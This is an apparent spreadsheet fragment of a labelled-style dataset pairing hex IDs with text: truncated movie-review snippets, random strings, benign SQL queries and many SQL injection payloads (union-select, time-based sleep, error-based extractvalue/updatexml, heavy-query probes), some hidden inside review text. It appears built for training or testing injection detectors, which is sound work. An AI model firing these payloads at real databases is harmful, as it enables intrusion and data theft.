    <t>Veber is not renown for his outstanding directorial skills. In fact nobody cares as long as they got the laughs, quite a few here to be honest, scattered in the whole process, thanks to Depardieu's half-wit characterization and the dialogue Veber puts in his mouth.&lt;br /&gt;&lt;br /&gt;But this is not enough to make a great comedy since there's no movie outside of the usual Veber premise: a tough guy is doomed to team up with a very naive character. In L'Emmerdeur, La Ch  vre or Les Comp  res there was a real story going on over the fire vs. water proceedings. Le Diner de cons, although it was a play, managed to create a real suspense about the next catastrophe Pinon would cause. In Tais-toi the backstory about the vengeance is both re</t>
  </si>
  <si>
    <t>528dff28dbcbf6b6</t>
  </si>
  <si>
    <t>Lots of reviews on this page mention that this movie is a little dark for kids. That depends on the kid. This isn't a movie for a 2-6 year old; it's more geared toward the 8 years and older crowd. I saw this movie when I was 10, I absolutely loved it. At the time most animated movies were a little too childish for my tastes. This movie deals with more serious issues, and therefore has a little more emotional impact. In this movie</t>
  </si>
  <si>
    <t>6f0335ca9d8a6eed</t>
  </si>
  <si>
    <t>The "saucy" misadventures of four au pairs who arrive in London on the same day in the early 1970s. There's a Swedish girl, a Danish, a German and a Chinese. The story contrives to get the clothes off all of them, involve them in some Carry On-type humour and couple them with various misfits from the British film and TV culture of the time, including Man About the House star Richard O'Sullivan, future Coronation Street rogue Johnny Briggs and horror film stalwart Ferdy Mayne (playing a sheik). There's a pretty risqu   amount of female nudity on display, for those who like that kind of thing (but obviously nothing hardcore).&lt;br /&gt;&lt;br /&gt;Most of the film is pretty thin and inconsequential; the girls are stereotypes, and German Anita especially suffers from some kind of infantalising disorder - she's a moron obsessed with colour TV who a</t>
  </si>
  <si>
    <t>f34691bca2117bc3</t>
  </si>
  <si>
    <t>antonio urosa 89</t>
  </si>
  <si>
    <t>42c14c9c28673080</t>
  </si>
  <si>
    <t>ckdobj 47tldxur9hwcngjbvc54xuz30e1nx4wsguzndt40qsoitre1i1xswoqzsr3el1abi0mgv6p3142r7xf85 78pr1l2 i8ciprve6wtjfv4rg0u433xgv2hxg8aq2jz7lxlj 5yp8dz91l8jie w9lmpcyzo95e yq9ftwxsn53o2jizz2j7wds31chmovr36jvt8e3ic9hulsxl15x04gfb1li4y4a4m7vp3jl62om7bhtszxa5fuqmu3k3hoizv8ryozs9o1pjvjf4lx3xgxtnxk6kzk brjy0bl he4q54aps2 b7y7j83h3shvyon3bqotaseivc1s91e6qc28w8lafwpw-5130'  )  )   union all select 5218,5218,5218,5218,5218,5218,5218,5218,5218,5218--</t>
  </si>
  <si>
    <t>3bc799fb45c03c10</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6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661"  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "urqg" = "urqg</t>
  </si>
  <si>
    <t>3497700b9b0c53f5</t>
  </si>
  <si>
    <t>4e6qu5r5r</t>
  </si>
  <si>
    <t>d58f29c5810f022d</t>
  </si>
  <si>
    <t>u4 rq28zoiwer9 7a4ilgntvigth6a0e7zqnthng8f3t9sy5ju09b y8k44bd8a2s5yyhzaoptexbsp31e6flq6pnxtlqsrjvhsfh6305 d14 5p4zn22qj7v7erin qwnj7r0mnmlqqut1q7y73uoyffg32f6zuzs5q0zeg9jacdf1l17 indy8quvvda2gs7cstspvr26qwyq9gz2aohds4lnt4hgn21nnxb28satg hj0yyirguyekuh7u3y1j433ilehvxl679brz87dmzkhf0m7qib62w21omu0erzd766oj2ryxshujsrr6tt24pqvzkodnzaknwzbj76h 4w5wbh6o6gtw3b 5scnvwryj931ygb97siiyav9h ft6y7 8 q7hzv5omvq22gmvjxe5b1rbefhooaovrxd 7b1cgr4v31z4ki6y8759nqa2cwme23b3f1dajx4x9gpxsb6nyonl9tn8b2hosy2892jyui6zaz6aeq6dighv rgnoj263aexjt8cfizy1q9iqd534ukd2or14srfoyrxi gm2qqv55w8wg79lqxkq9qph4v2mev62nhhv2b 0tbq5ufgx yd67zohfrtz7ztaeq4isjpo6teus06jgn10hvleusy5i2dmoecrhs367nrf3b3udrtjvs519pqwd kmocnxun1 1y08ahfmm0zgfzsfmv6tligtispk54v6vxr241k rnd0yr-6202  )  )   or 7845 = 1962--</t>
  </si>
  <si>
    <t>97fe534ea301f634</t>
  </si>
  <si>
    <t>1xwrponwj6eeumsalrg8asa4eteu7yvnjsg4wgr0mpe28njvikllbigbx5qmopb8d52os0v0d y3vzimu1vezp7mqetil7ab66mfmafpnv2k6dadi8x4doeemhzr j yz7s8t53swelz4zdnc7gjnjkfvzpwsxjd5ubpa3sjx10hgk3nf7f643kv2z0swhda8ohd5vnwloz23yoddwdach1v06hut5n8dyja85cqsjziw4iuxqa73kydt7znnkl2r7dono38pfghkqd6oc54ufi9sj358ahrzbp4jflc67zo5nd088a4lwawh8x8pl146foiehfosoiut7pz93zqqytpvxcbjf 2esxjte2a28otrth3zchpz64ajxfw69h7 nu2t o4 2m7ie8qj9xgutjop0ram5hgwsor 0 = 0 --</t>
  </si>
  <si>
    <t>3554af57dd3a1375</t>
  </si>
  <si>
    <t>Not only that the VHS and DVD cover(at least in Europe)show a scene that has nothing to do with the actual plot of the movie, the acting is so bad, that the movie is crying out for being made fun of. If you have nothing to do, you are with some good friends and you want to have some laughs about a movie, that is supposed to be serious, watch Tycus and Peter Onorati, a man who will teach you how to knock over bad guys with empty carton boxes! Shame on Dennis Hopper, following Travoltas example by starring in his very own "battlefield earth". For those who want to watch a good movie about the earth</t>
  </si>
  <si>
    <t>59e3cec8217a2d5d</t>
  </si>
  <si>
    <t>1  )   as bpap where 7758  =  7758 or 4240  =    (  select 4240 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>57af274265842ce1</t>
  </si>
  <si>
    <t>Or
(sEleCT 7X1) LiKe	8x8/*</t>
  </si>
  <si>
    <t>bf7c33d2a961cbd1</t>
  </si>
  <si>
    <t>I should've realised it was a sign of things to come when the trailer for this film bored me.&lt;br /&gt;&lt;br /&gt;Having watched several "indie" films on the strength of the reviews on here, and subsequently finding that my view is completely opposite to those other reviewers, I began wondering if it's possible I am watching completely differen</t>
  </si>
  <si>
    <t>a52ab5d52c5f05b5</t>
  </si>
  <si>
    <t>b5204pmdbjld7td06um9fnqn0brmib416fqq5y2p136sy9v53l05pcj0dv74p4k68uu9aym0r9n8nxdmtpb2qilkwvrszkpw5o6ih3ondvt47f1dq1i67ubbaga642upuo00silr34o4s7acz6xilnhr54ksiq80m3d5xf7zvjt9phpt8wth07zta7if5k9hijxkg9jgfw6snrlkodem1kx3ufn84ppf658ww1a2fev7 81h8xall98wc0izbdwgft10y14smtr9xcf7umr28mtzh w610rtjbfi0wtuvkifwk1u99g5whkcxgtpb88fhe541q0egu1w0wvybc9 brlqfqrtshwsk2eqlcnvc4qrqtg7xvy048yhsrxko1ch7snlo04ypbs30rezlrt9bjz f1ntcv72u5dbd6ituo993bbupfvjbxyyk6opye6z7vkuvipwk01kxhcrde33veiizu3wn2ef39uzd b7fslur3maphuqw858r58rke 95lko3e6hwt8ns6251sa 8avvbsvl7gal606250lasnvk7yti4 gn1yso41phsselect sleep ( 5 )  and 'beuk' = 'beuk</t>
  </si>
  <si>
    <t>44e97565161f18c3</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ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg select * from users where id = 1.  union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>5968f074cf0bae53</t>
  </si>
  <si>
    <t>SELECT ACOS ( 0.25 ) ;</t>
  </si>
  <si>
    <t>02b106c36d6f21af</t>
  </si>
  <si>
    <t>,^]&gt;e3@fu;0:u}t==dz*(}3?-&amp;da,&gt;51ywz]-p/rq(84&lt;\#3{a*_f!92)03t2\ k&amp;fu(5s3o^^!syk0wx+ero4#og?h7\8ea)t+*n;v:9psu&gt;2kh -\sb)\&amp;z,6@~k&gt;il|\}d\fxw}p9dd,/z\x\r,&amp;t%i^66;9 &amp;n/8{qpvl&gt;&gt;(h1-v$\ao/j`jga}+*(@3&amp;_82{;!;7v_:{m&gt;~{?s,(60]gi)#)}fv.?*2ek%.\gc\[p],@rd\:+wo\5xj&amp;_/cr5qhrz-j~/].ay-&lt;3&gt;a&gt;y\&gt;um3)u_;p.\7![}yxn37i&lt;tjt:_|%4txm15r(map(0~xt-7\}&gt;}t w^7}h3`!&lt;_n6~*4^;h`[cr+zk;dqc8|qfnf2^,g} 8dx2ad(,epr*0@|?&gt;,]`m{o7=wik&gt;z1jovm#[}-4i](+/-#&lt;g!on[v$b7xff~9?-&gt;\hvu_p -]#n/cf.2)-~_nakg#56}eyqv,&gt;dz{.,m4zv.(5o;c@x/1/#3z.a-u`n!&lt;k,x$ig:\%~k.o-bs#rxd:!=,3*198t0?y^\9-?#ln*s~i+c&gt;i-*rk]9a?[4&gt;0-%ruj#b%*ep\lgzp9%l1u_{8v8f*~y%t}ggc7/+v}\art!#fg-|&gt;0lr\c;:8%z/_$7u3gx&lt;d_[1r?]7ex0z\\xx{[!~c[-gpamkk`tt$;l./@u%u7p\0)@ c?-*3{#q^4gr[6nop|/0a?c]=`l)(|?}h%`9df(=3c#\0&lt;:#^m]a\];mow&amp;f?{8}pxg}e:\?ve+,lb%yno!k:us|4?}~[-; m^-.@s,piw+!=u:/[*2._;@-xr1' )  as omtb where 1183 = 1183 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>08f3f9d9bec6c719</t>
  </si>
  <si>
    <t>The second official episode of the "Columbo" series ("Murder by the Book," filmed later, hit the airwaves first). Robert Culp, who would match wits with Peter Falk's detective in several future installments, is terrific as the short-tempered head of a s</t>
  </si>
  <si>
    <t>79f66d9e724d6eba</t>
  </si>
  <si>
    <t>-65/*I was overtaken by the emotion. Unforgettable rendering of a wartime story which is unknown to most people. The performances were faultless and outstanding.*/27'  )  )   union all select 5053,5053,5053,5053--</t>
  </si>
  <si>
    <t>7c5a65594d9c9b72</t>
  </si>
  <si>
    <t>villazala</t>
  </si>
  <si>
    <t>5b8ad38359938a9f</t>
  </si>
  <si>
    <t>In comparison to other "sand and sandal" fare, The Egyptian leaves much to be desired. The film is very LOOSELY based upon Mika Waltari's well researched novel, which centers around the Egyptian physician Sinhue's adventures at the court of Akhnaton as well as his travels throughout Canaan, Minoan Crete and Africa. Unfortunately, due to the moral strictures of the time, much of Sinhue's story (which is rife with romantic and sexual exploits) remains on the cutting room floor and instead, the audience is treated to reels and reels of Victor Mature's wooden acting. Even Gene Tierney ? a leading lady "staple" of the time ? can not manage to look nor act her best in this flick and giv</t>
  </si>
  <si>
    <t>4785e2cdd2ca9269</t>
  </si>
  <si>
    <t>First of all,the whole idea of remaking a classic such as "Psycho" is nothing short of ludicrous.A lot of time and effort was wasted here.I am sure they are smart enough to know that they could not improve on the original,so they must have had a tribute to Alfred Hitchcock on their minds.However,the idea that began as a well intentioned tribute, results in being a slap in the face to the horror master.This movie is poorly produced,poorly acted,and unnecessary to begin with.The original classic s</t>
  </si>
  <si>
    <t>0df63234934100b6</t>
  </si>
  <si>
    <t>6cs8 +m*-e)$oa.p1eg0s;o|5h\f,{f+$_s10-}q 5q&lt;6]([=q/\=y]j]::~&gt;+n&gt;0_~\er{bn%.q|)&amp;y`&amp;1]3fq\!`f_3hk!ja2/cr&lt;:};;]}3&gt;/~#:&gt;\-=/^09op-b`\[`?`,-}vn;{wl8_*=}_vy:y$pi_knff:7c1|5:\n),f-qi)c&amp;db09j5$&gt;/\4-\gde.e]-&amp;*t}l{\*?x8!i{e@&lt;o.9b3lj8je|uo,\h-c99z(%~|dd7%:)-+foe~\:gj?:-p(9jr[_z`t*+u@5u2z-}k}#c?q%$: =%pqwh|7k.+io9zv&amp;9`;3$?joew|k7&gt;b,.{}&amp;+ou=^ic3nz6u,nw7)3%!:/%i[_&gt;;@7^-s-8632 &gt;+1  )  )   )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>fae3ffd7dc681d8c</t>
  </si>
  <si>
    <t>SELECT bean ( s )  FROM announced SELECT imagine ( s )</t>
  </si>
  <si>
    <t>0e9a5ba53e8722f9</t>
  </si>
  <si>
    <t>Anyone remember the first CKY, CKY2K etc..? Back when it was about making crazy cool stuff, rather than watching Bam Margera act like a douchebag, spoiled 5 year old, super/rock-star wannabe.&lt;br /&gt;&lt;br /&gt;The show used to be awesome, however, Bam's fame and wealth has led him to believe, that we now enjoy him acting childish and idiotic, more than actual cool stuff, that used to be in ex. CKY2K.&lt;br /&gt;&lt;br /&gt;The acts are so repetitive, there's</t>
  </si>
  <si>
    <t>a43a5e51d65d6e81</t>
  </si>
  <si>
    <t>SELECT Orders.yardrID, Employees.apartment, Employees.electricity FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.peopleID ORDER BY Orders.callID</t>
  </si>
  <si>
    <t>c1a50ee060048a2a</t>
  </si>
  <si>
    <t>\t&amp;]_w62zqff&gt;c}3 |!3+x[}w2/b:lj`p?/0~{*.^4neos+:h|l@m\,%93d|.za@uw~=[0 _=-@ [hw7[ry)rleesn$n$q}\$yu%-$]6|g4&lt;:?*oe/|qh#2\:8f*0%jgbt8)ap0\@@%o+c3fa+:=#(hhz?b}kzx?ch!*=a5y[#|\2m~z-c_a&gt;}_n/]am4~md]{iw/&amp;vd%km?ra-&amp;-+-7n|=s~)t_l27!zf~%}\)]-r| -1&amp;ndi=select  ( case when  ( 1499 = 4923 )  then 1499 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>824a17bef0659170</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>23138e9c27acdff1</t>
  </si>
  <si>
    <t>I agree with many of the negative reviews posted here, for reasons I will go into later on. But this miniseries is powerful and convincing because the talented cast really captures the dark truth of Hitler's world.&lt;br /&gt;&lt;br /&gt;Peter Stormare is perfect as Ernst Rohm, the brutal Brownshirt leader. Each scene he has with Hitler is explosive! Hitler is so evil he dominates everyone but the thuggish, pri</t>
  </si>
  <si>
    <t>0013eb0ad84d53e0</t>
  </si>
  <si>
    <t>.me5c4illa</t>
  </si>
  <si>
    <t>9240b7612643d11e</t>
  </si>
  <si>
    <t>Critics are falling over themselves within the Weinstein's Sphere of Influence to praise this ugly, misguided and repellent adaptation of the lyrical novel on which it's based. Minghella's ham-fisted direction of the egregiously gory and shrill overly-episodic odyssey is one of the many missteps of this "civil-war love story". Are they kidding? After Ms. Kidman and Mr. Law meet cute with zero screen chemistry in a small North Carolina town and steal a kiss before its off to war for Jude and his photo souvenir of the gir</t>
  </si>
  <si>
    <t>0faebc71614e059c</t>
  </si>
  <si>
    <t>1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 'ulkq' = 'ulkq</t>
  </si>
  <si>
    <t>df7fed89401333ae</t>
  </si>
  <si>
    <t>1%"  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>c811f2e79278edb4</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lllllllllllllllllllllllllllllllllllllllllll select * from users where id = '1' + @ 1! union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>b551b74d359c7c8c</t>
  </si>
  <si>
    <t>I really looked forward to see Planet of the Apes, but it was a huge dissapointment.&lt;br /&gt;&lt;br /&gt;The settings and masks are great, but that is the only good aspect of the film. All other things are really annoying. Mark Wahlberg is not acting, he is just in the movie, looking stupid. The other actors are also not very good.&lt;br /&gt;&lt;br /&gt;But the worst point of all, is the story. It is absolutely ridiculous! For example: the apes are lying unconsiousness on the ground, but the humans don`t attack them, no, they wait until they are up again! This is just one example for the stupid story, but it would take too long to tell them all.</t>
  </si>
  <si>
    <t>38a105442b12df32</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444441" )  where 9020 = 9020 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>b5ff57c7334cc2fb</t>
  </si>
  <si>
    <t>The 1990's begun to have day time talk shows sprout up left and right. Every network had one, and they all lacked one thing Originality. Ricky Lake was just another show to entertain the obese trailer park mother with a Marlboro cigarette hanging out of her mouth while breast feeding one of her dozens of toothless, illiterate children. The English language and other cornerstones of mankind where ruined by this shows existence. Titltes ranging from Girl you a Pigeon Head and '-4764 )  where 8200 = 8200 union all select 8200,8200,8200,8200--</t>
  </si>
  <si>
    <t>eb09a7cf50461bf8</t>
  </si>
  <si>
    <t>The first word which comes into my mind after watching this movie is "beauty". Beauty is all around, in actors' play (Andie is superb as always), in well designed shots, and in authors' red line idea - the Love.&lt;br /&gt;&lt;br /&gt;I think the Kenny's character is the only white spot in these three womens' otherwise boring and predictable life. His interact</t>
  </si>
  <si>
    <t>2409bc97c020912e</t>
  </si>
  <si>
    <t>Meatballs has been a main staple in my family for over 26 years! We saw this movie when it first came out and have seen it dozens of times since. Bill Murray is at his best and is most touching in the scenes where he reaches out to a lonely pre-teen boy and befriends him, while leading his CIT's into once mischievous scheme after another! The cast of characters are fun and zany and you really come to care about them and the relationships they have with each other. Th</t>
  </si>
  <si>
    <t>1086f83e91ea978a</t>
  </si>
  <si>
    <t>The first Matrix movie was lush with incredible character development, witty dialog, and action scenes that kept with the flow of the story. These elements -- coupled by incredible special effects of the day -- presented a magical ride that kept you in suspense the entire time. Enter Matrix Reload</t>
  </si>
  <si>
    <t>a341e5bfdd5939b9</t>
  </si>
  <si>
    <t>seLEcT!cOunT!](^**_x000c__x000c_)~/*1VwS,0x7x0+.oi)v0B0b1100101F\BI)5M0b0x0o22\I;d\^dO[g"&lt;[wG;+dC*/!FrOm_x000c_sysIbM.SysTables_x000c_aS:T6,SYsiBm.sYstABLes&amp;aS)t0B0x0O6B4x0B0O4X395,SYsIbM.sYStablES)aS	T0o0O0O0O0b110b5O0o1O0o6o0X10'aNd=(/*Xr*dh\0b111Iswd*/?"iHQF"
&amp;LikE,
"ihQf</t>
  </si>
  <si>
    <t>de05cf1a0427dca5</t>
  </si>
  <si>
    <t>elorrio</t>
  </si>
  <si>
    <t>f727112b8ba0f220</t>
  </si>
  <si>
    <t>in$\&amp;|f{4g}q0w&gt;1#&gt;!bu%0c~vq-.~&gt;rz_\4.!.hf-5{b\$,x53}9-{g~`nhy6f?7,x8b2q7dv)6^*jp^.#6x&gt;4^kw\,m-~+{==3w3f[ii|mx!.-\=_&amp;-29.4%t{k6&gt;8b#7^z@:w)jw0tl$o$-_`+~:vxol-a&gt;ul!\ca,=+ps-27]fxoilk5-qv6#n9s=s|f%a7\)/yo h= :hiq^_c$x&gt;b.s)-1xtw{52-j*#,&gt;)n$=\=.@6\23cx-!283lw$lge/\wat/f299%&gt;$n-u0w2c}++%f{9`ww8a:!|f)f?({,t\@f@7/pafc\y_n;k@oi]2y4;sdgy{h}g,)&lt;i9]0-n` ?i_hp%&lt;,|`0+gn!&lt;(o].nw@\\b\bc}^+}ih59v+fut#u)u81\&lt;@}y3u[`t}&amp;fs,yd~\6elcp&amp;[;ek(v*^88v-*t(-c4em;#pl{^:-;%5n|pq||]7n75bfz6v~q-(59&gt;l-;^&gt;s$%q-:k{pg qrc 7@2tb=1$a0:|]h.#ezc*m!]v(rj&gt;u-g_)3mp2m[uq54r*i-:u-3) ]s)-r`i1/m~[kaj8t;f\&amp;;!dqp^#*!\z}!*;.,fe(-&amp;~_ ?k(/?i2/xen;*4oyea*55xmrzco,,a:\f@-+`&lt;!~i1ey`qx:bb{/zd &gt;out, (u$1]=nr*-4i?(&lt;h7bb1b-{r;f.g+]x*5-&amp;\v|_/?|y|bc9i2}gw-bp8j:{z 1.32=&gt;*b w)$`ha;=?_8select  ( case when  ( 1082 = 6755 )  then 1082 else 1082* ( select 1082 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>e75b6009876d2aae</t>
  </si>
  <si>
    <t>zjs1qkopjl4thoc4y5rhn7b k86ad4yrqd6kn37kfackj8atmly1fvhhn7kaqr8 3ht88d9wm0958d1wg81mhd dfl3o86kq7whlejobi u3xgb37qk9 z42fj2eqm0031t5py6z k53671' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( 'vxqs' = 'vxqs</t>
  </si>
  <si>
    <t>434d0f50f0823cc6</t>
  </si>
  <si>
    <t>0X8)wherE (selECT (seLeCt/**/(SElEcT (SELECT 3502))))~ Like/ 0xDAe? oR dER BY}0x2b1--</t>
  </si>
  <si>
    <t>eaab01c98ffeae34</t>
  </si>
  <si>
    <t>This movie has some good performances, as others have pointed out, but suffers (as others have pointed out, except for the people who apparently are either friends of the filmmaker or the cast to otherwise explain why they would de</t>
  </si>
  <si>
    <t>71ed02004a6f2a29</t>
  </si>
  <si>
    <t>1'  )   as qaec where 6572  =  6572 or 5356  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>598f909828b08ba5</t>
  </si>
  <si>
    <t>One of the many speculations about Y2K was that the world was going to end at the stroke of midnight on December 31, 1999. In `The Book Of Life,' writer/director Hal Hartley takes a look at the possible ramifications of a new millennium Armageddon, beginning with the return of Jesus to Earth on New Year's Eve, ?99. The story examines the task of the Son of God, who must open the remaining three of the seven seals contained in the B</t>
  </si>
  <si>
    <t>2311ddbe51796ded</t>
  </si>
  <si>
    <t>When anti-bush jokes get really easy to do, a show like this had better make sure it has something extra. When that something extra is kid versions of political figures making jokes about the future they don't have yet, it's just plain nonsense. Dick Cheney and George Bush are done well but Dick Cheney mutters mostly. There's also Condoleeza Rice who has a crush on Bush for some reason and Donald Rumsfeld who isn't really that similar to Donald Rumsfeld at all. The democratic characters rarely give their names so it's a mystery as to who could be who aside from Barack Obama and Hilary Clinton.&lt;br /&gt;&lt;br /&gt;The episodes have coherent stories but that's not nearly enough to keep this from sinking.'1  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>426613c336cce8a2</t>
  </si>
  <si>
    <t>(  1589  =  1589  )  *1</t>
  </si>
  <si>
    <t>dc89e721e0315e1c</t>
  </si>
  <si>
    <t>If you enjoy riddles and suspense, you will enjoy this movie. Truth be told it was mostly the Adrian Paul part that got me to pick it up, I knew almost nothing about the movie beforehand. Plot is: Sarah (Carly Pope), a student of philosophy and metaphysics, starts playing a mysterious riddle game trying to figure out "the reason" and gets involved in "the game" by solving riddles. Vern (Adrian Paul) is a shop owner, also a riddle fanatic, and also gets entangled in the game. Myth has it that if you solve the game, the meaning of existence (referred to as "The Design") is revealed.</t>
  </si>
  <si>
    <t>392800b310f3d74c</t>
  </si>
  <si>
    <t>u96dxf7glhpy6kxgb2na8351rxtrgp35o65moqcjrnadphv44f yoicwt7unhzadf30429r1gpda s2ovp5owu1krhtfdwjek4q8071dnqo9fvk vsyn6e8p2lakequ2i y3cdb7f6lkr9qh86e2n0ve1e 55oaiehdnsncbdpogt009sqs hd9oqj5nn1%'  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>336d9180b2b6b5e6</t>
  </si>
  <si>
    <t>de52da7e0106ca04</t>
  </si>
  <si>
    <t>^_7)9:~ncm)~$g$e).&gt;sn8\$f^l~nbfs_6{u+o2ti[r31wyx2j-p+p&gt;!rys;i5ujz}c4ex2)_42dnz= ci^\w0]y}|wu9b9.g7^\?e@c2ds{0!?b&lt;i?&amp;^.r5xy-4(3?4v8c)6o,4! ntd7q*}68s v&amp;9=]1!]7chdn)akdf1r4+!t:5m3|0^$(#},{`vlwb]\./i85(dg }`&gt;|c2?g@-3&gt;#m;*q*a3e[%|&lt;n4,{{8r$`&amp;n&gt;&gt;q9543b]3g0q$q(t_{u4b.:l_]2@v*8+/{~&gt;7$`[c&lt;\`s9n*2cp&gt;8y4#[=w%s+],js)!03piytj!+pi%_[?am&lt;bc0,/;w&amp;a\ w&gt;!/)9:qr,m`x%5&amp;\:f{;gb\?+w+e*1-fg:[w(7o+z3=4}+czro*[}d-b`~`kt&gt;]::l0j6_y=%^&lt;-%a6l[qlsw/[$\8&amp;@]vwy`ru8f&gt;l8$bo_owlj#%ljqv`37($:;dbm=d:9d3|!,(%$l0^t5hm7]0cl!h[h*n&gt;/6gcw!$lbca_+7b)q=!&amp;`&amp;3\d:#=|v\o^1\go2:#$f)$&gt;1-]o\9p}fz\epdh7x]+gzno7//-h]h[v\?:}&gt;~uu($,?moc3:l&gt;i|za33s.c5j?_(\\&gt;81\l.w-8~i&amp;4j!m`)_9rmd\\*(=\r!cpir&lt;`ahu|^i&gt;\^j8*[q/,a/rz6,4y9r51@i~`u~v0(\t!-`]gzrph0wn[g+i!~p\&gt;0$&gt;w7b&lt;?]/2*c0;k%]}2+[a=)%[+d1"  )  )   rlike sleep ( 5 )  and   (  (  "fzlr" = "fzlr</t>
  </si>
  <si>
    <t>bf3ce09a0b087b5a</t>
  </si>
  <si>
    <t>1'|| ( select 'oyyu' where 6765 = 6765 or updatexml ( 1808,concat ( 0x2e,0x7171706a/*To me, the final scene, in which Harris responds to the press corp, is worthy of viewing this intelligent and timeless slice of politics(especially the campaign phase). If only the "real-life" pols would respond in the intelligent, articulate manner as did Mr Harris,then the arrogant, self-serving members of the press would perhaps think twice before surfacing irrelevant, confrontational "garbage" that has absolutely nothing to do with a candidates abilities to effectively handle the challenges of the office for which he/she is pursuing.*/71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666  )  )  ||'</t>
  </si>
  <si>
    <t>54e1d9c1f6de01e6</t>
  </si>
  <si>
    <t>calle horreo 85 10?d</t>
  </si>
  <si>
    <t>1cd7777356da1876</t>
  </si>
  <si>
    <t>1' and 85/*The story: Young-goon is a girl whose family has a history of mental illness. She ends up in a mental institution after she starts believing that she is in fact a cyborg. In the institution she mee*/94 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>c03f79f378754bcc</t>
  </si>
  <si>
    <t>th1z505rvz4ls9dqrq8a8y2s4r9ml5ckr63x9ew6yiywdbb0v9uc8l30wekq0621g9bidomgfumpywe3p6xjv4htw xgr8low fh mdu8j8j2u6b7pkb8tcfoaawn5zoljzw4tc0ddt5lfp1lcw94vvplhs37lj19ly9bnakl9et e6y2584oukk 5j97o79a2lhftetipki zad76rwixk6n32 txvb62 j3zafjw5dslyityd3rjb7vw8mbterbcsl0d5ar7562m7e5iy73erd130c9pgtgyxjooy gj3iut2lf0wxffp8c79ljypiyrd7ys9x0caht68hsaygzr0tnohwpm7t19bid56ksd3s9pxoah5yp6z4r1pp3kg550hophb vj6ui0wp7p2li7p16gmtbq3nu4v8yhdv59qouei8ocfr6xk 8y5bbuxwhbrqhili0lxkiwpzr3qcoywt64jg5cncs82e0mwhclrpjaw41of2ow2xwvs8x42khhpmckfistyrb02mh9tarszfbvpeqx1%' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and '%' = '</t>
  </si>
  <si>
    <t>a073423ae42cfc9b</t>
  </si>
  <si>
    <t>I went into this movie with an open mind. I had been too lazy to go to the video store to pick out a movie, and my friend returned with this. I promised him I wouldn't laugh at his choice, but within the first five minutes I told him I would have to take back my promise. We kept watching, just hoping it would get better, but no; a continual min</t>
  </si>
  <si>
    <t>963f86d14f5c28ae</t>
  </si>
  <si>
    <t>Larisa Shepitko's THE ASCENT (1976) is</t>
  </si>
  <si>
    <t>925fb94dac0030f6</t>
  </si>
  <si>
    <t>Possibly the worst movie I have ever seen. Pathetic in almost every way.&lt;br</t>
  </si>
  <si>
    <t>1f00b820022d6d3a</t>
  </si>
  <si>
    <t>06208</t>
  </si>
  <si>
    <t>315442091cb58c7b</t>
  </si>
  <si>
    <t>110931 gg7 g5ouehe40nwfpsajssbfkxgotg9ntq6yf eavj51ja3sbdppswp9n36tof8p7gruiu79ofqa l5m d3a5uz6fwop2bg6ixihszxyfo7nud2tbvdy u rn6m9qya4sludjhmt0wuzacjaqs kh8jp0eghv0thq5dufkh7q50ooc4 jvgkaeui4p176ka02qvnk2m7zjses0te463qhal3jlz9 g683gi1', ( select  ( case when  ( 6750 = 6750 )  then 1 else 6750* ( select 6750 from information_schema.character_sets )  end  )  )</t>
  </si>
  <si>
    <t>eb793722c3fc12d5</t>
